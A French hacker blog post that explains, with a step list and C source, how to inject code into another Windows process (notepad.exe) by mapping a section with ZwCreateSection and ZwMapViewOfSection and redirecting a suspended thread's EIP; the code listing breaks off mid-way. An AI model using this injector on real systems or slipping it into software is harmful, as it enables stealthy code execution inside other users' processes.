Baboon's Blog - Mot-clé - NtCreateSection
2016-11-05T16:24:49+00:00
Baboon
urn:md5:f26b67ff836d93885e04843b0cae9de4
Dotclear
ZwMapLolzSection ou le retour de Iinj
urn:md5:c272818a184a2a51fedcff22d6167654
2009-06-27T18:09:00+01:00
2009-06-27T18:09:00+01:00
Baboon
InjectionNtCreateSectionNtMapViewOfSectionZwCreateSectionZwMapViewOfSection
<p>Salit salit salut les zigotos</p>
<p>En voulant faire un petit hooker d'API (dont je parlerai dans un autre post prochainement) je suis tombé sur l'API ZwMapViewOfSection exportée par ntdll (c'est l'appel a cette API qui déclenche l'envoit d'un message DLL_LOAD au debugger quand une dll est loadée)</p>
<p>Apres un petit peu de googlisation on voit dans la msdn que :</p>
<p><q>The ZwMapViewOfSection routine maps a view of a section into the virtual address space of a subject process.</q></p>
<p>et que cette fonction prend en parametre le handle d'un processus.</p>
<p>Cette API permet donc de mapper une section dans un processus, l'idée est alors d'injecter du code grâce à cette API (et donc sans utiliser le classique VirtualAllocEx et WriteProcessMemory)</p> <p>En regardant un peu le code de ntdll on voit que cette fonction est quasiment toujours appelée avec le pseudo handle correspondant au processus courant sauf pour les fonctions Rtl[...]Debug[...] (à creuser d'ailleur ...)</p>
<p>Bizarement je n'ai pas trouvé de texte ou de code sur ce sujet (je n'ai pas vraiment cherché non plus) et je n'avais pas vraiment prévu de coder un poc.</p>
<p>C'est en "discutant" avec ivanlef0u (comprendre gueuler chacun de notre coté en insultant l'autre) qu'il m'a convaincu de coder un pitit poc ("ba vas y fais le alors et fais pas chier ! j'vais matter un film, si dans 2h s'pas fini je te kb à vie du chan !" [ndbaboon] ba ouai il est vulgaire ivan [/ndbaboon] )</p>
<p>bref j'ai donc codé dans la nuit un petit poc qui fonctionne de façon relativement simple :</p>
<ol>
<li>Ouverture d'un handle sur le processus et une de ses thread</li>
<li>mise en pause de la thread</li>
<li>récupération de son context, écriture de son EIP dans le fichier qui va être injecté</li>
<li>Création d'une section à l'aide des API CreateFile et ZwCreateSection</li>
<li>mapping de la section dans le processus cible grâce au handle sur le processus et à l'API ZwMapViewOfSection</li>
<li>détournement du flux de code grâce à l'API SetThreadContext et reprise de l'éxecution de la thread</li>
</ol>
<p>Il y a néanmoin quelques contraintes, le code ainsi injecté le sera dans une page sans droit d'écriture, il faut donc que le shellcode utilise des variables locales et bien sur qu'il ne soit pas dépendant de l'endroit où il est injecté (call .delta / .delta: / pop reg / sub reg , .delta est ton ami)</p>
<p>code de l'injecteur (ouai je sais je ferme pas tout mes handles ...) :</p>
<pre class="c"><ol><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #339933;">#include <windows.h></span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #339933;">#include <Tlhelp32.h></span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #339933;">#define NTSTATUS long</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #339933;">#define STATUS_SUCCESS 0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #339933;">#define ViewUnmap 2</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">DWORD GetProcessIdByName<span style="color: #66cc66;">(</span><span style="color: #993333;">char</span><span style="color: #66cc66;">*</span> name,PDWORD TID<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE ths <span style="color: #66cc66;">=</span> CreateToolhelp32Snapshot<span style="color: #66cc66;">(</span>TH32CS_SNAPPROCESS,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PROCESSENTRY32 ProcessEntry;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> THREADENTRY32 ThreadEntry;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ths <span style="color: #66cc66;">==</span> INVALID_HANDLE_VALUE<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>ths<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">-1</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ProcessEntry.<span style="color: #202020;">dwSize</span> <span style="color: #66cc66;">=</span> <span style="color: #993333;">sizeof</span><span style="color: #66cc66;">(</span>PROCESSENTRY32<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ThreadEntry.<span style="color: #202020;">dwSize</span> <span style="color: #66cc66;">=</span> <span style="color: #993333;">sizeof</span><span style="color: #66cc66;">(</span>THREADENTRY32<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Process32First<span style="color: #66cc66;">(</span>ths,<span style="color: #66cc66;">&</span>ProcessEntry<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">do</span> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>strcmp<span style="color: #66cc66;">(</span>ProcessEntry.<span style="color: #202020;">szExeFile</span>,name<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>ths<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ths <span style="color: #66cc66;">=</span> CreateToolhelp32Snapshot<span style="color: #66cc66;">(</span>TH32CS_SNAPTHREAD,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Thread32First<span style="color: #66cc66;">(</span>ths,<span style="color: #66cc66;">&</span>ThreadEntry<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">do</span> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ProcessEntry.<span style="color: #202020;">th32ProcessID</span> <span style="color: #66cc66;">==</span> ThreadEntry.<span style="color: #202020;">th32OwnerProcessID</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>ths<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">*</span>TID <span style="color: #66cc66;">=</span> ThreadEntry.<span style="color: #202020;">th32ThreadID</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> ProcessEntry.<span style="color: #202020;">th32ProcessID</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span> <span style="color: #b1b100;">while</span> <span style="color: #66cc66;">(</span>Thread32Next<span style="color: #66cc66;">(</span>ths,<span style="color: #66cc66;">&</span>ThreadEntry<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>ths<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">-1</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span> <span style="color: #b1b100;">while</span> <span style="color: #66cc66;">(</span>Process32Next<span style="color: #66cc66;">(</span>ths,<span style="color: #66cc66;">&</span>ProcessEntry<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>ths<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">-1</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #993333;">int</span> APIENTRY WinMain<span style="color: #66cc66;">(</span>HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, <span style="color: #993333;">int</span> nShowCmd<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> NTSTATUS <span style="color: #66cc66;">(</span>__stdcall <span style="color: #66cc66;">*</span>ZwMapViewOfSection<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">(</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE SectionHandle,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE ProcessHandle,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> OUT PVOID <span style="color: #66cc66;">*</span>BaseAddress,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ULONG_PTR ZeroBits,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> SIZE_T CommitSize,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PLARGE_INTEGER SectionOffset,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PSIZE_T ViewSize,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD InheritDisposition,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ULONG AllocationType,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ULONG Win32Protect</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> NTSTATUS <span style="color: #66cc66;">(</span>__stdcall <span style="color: #66cc66;">*</span>ZwCreateSection<span style="color: #66cc66;">)</span><span style="color: #66cc66;">(</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PHANDLE SectionHandle,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ACCESS_MASK DesiredAccess,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PDWORD ObjectAttributes OPTIONAL,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PLARGE_INTEGER MaximumSize OPTIONAL,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ULONG SectionPageProtection,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ULONG AllocationAttributes,</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE FileHandle OPTIONAL</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE hSection;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE hFile;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD TID;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD PID;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE hProcess;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> HANDLE hThread;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> PVOID BaseAddress <span style="color: #66cc66;">=</span> <span style="color: #000000; font-weight: bold;">NULL</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> SIZE_T ViewSize <span style="color: #66cc66;">=</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CONTEXT context;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD nbBytesWritten;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ZwMapViewOfSection <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #993333;">long</span> <span style="color: #66cc66;">(</span>__stdcall <span style="color: #66cc66;">*</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">(</span>HANDLE,HANDLE,PVOID <span style="color: #66cc66;">*</span>,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span>GetProcAddress<span style="color: #66cc66;">(</span>GetModuleHandleA<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"ntdll"</span><span style="color: #66cc66;">)</span>,<span style="color: #ff0000;">"ZwMapViewOfSection"</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ZwCreateSection <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #993333;">long</span> <span style="color: #66cc66;">(</span>__stdcall <span style="color: #66cc66;">*</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">(</span>PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span>GetProcAddress<span style="color: #66cc66;">(</span>GetModuleHandleA<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"ntdll"</span><span style="color: #66cc66;">)</span>,<span style="color: #ff0000;">"ZwCreateSection"</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span> ZwMapViewOfSection<span style="color: #66cc66;">)</span> || <span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span> ZwCreateSection<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"GetProcAddress FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PID <span style="color: #66cc66;">=</span> GetProcessIdByName<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"notepad.exe"</span>,<span style="color: #66cc66;">&</span>TID<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> <span style="color: #cc66cc;">-1</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"GetProcessIdByName FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hThread <span style="color: #66cc66;">=</span> OpenThread<span style="color: #66cc66;">(</span>THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,<span style="color: #000000; font-weight: bold;">FALSE</span>,TID<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"OpenThread FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> SuspendThread<span style="color: #66cc66;">(</span>hThread<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> context.<span style="color: #202020;">ContextFlags</span> <span style="color: #66cc66;">=</span> CONTEXT_FULL;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> GetThreadContext<span style="color: #66cc66;">(</span>hThread,<span style="color: #66cc66;">&</span>context<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: 